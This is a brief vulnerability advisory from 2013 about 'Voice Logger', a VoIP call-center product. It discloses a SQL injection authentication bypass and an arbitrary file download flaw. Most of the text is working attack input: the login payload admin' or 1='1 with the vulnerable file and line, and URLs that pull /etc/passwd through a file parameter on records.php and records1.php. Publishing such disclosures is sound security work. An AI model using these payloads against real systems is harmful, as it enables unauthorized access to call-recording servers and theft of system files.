Voice Logger suffers from a remote SQL injection vulnerability that allows for authentication bypass as well as an arbitrary file download vulnerability.
6dd5934f028b093d5d8bd5693b5f0b0569da00f3dbba65651175bba34bfcf673
Author: Michal Blaszczak
Website: https://blaszczakm.blogspot.com
Project: hack voip - https://blaszczakm.blogspot.com/search/label/hack%20voip
Date: 16.07.2013
Voice Logger - VoIP software for Call Center
1) bypass login
login: admin' or 1='1
password: admin
line: 168 file: manager_login.server.php
2) arbitrary file download
https://192.168.15.145/poligon/asttecs/records1.php?file=/etc/passwd
linie: 2 file:records.php
https://192.168.15.145/poligon/asttecs/records.php?file=/etc/passwd
linie: 2 file:records.php
3) and other security bugs
Michał Błaszczak
https://blaszczakm.blogspot.com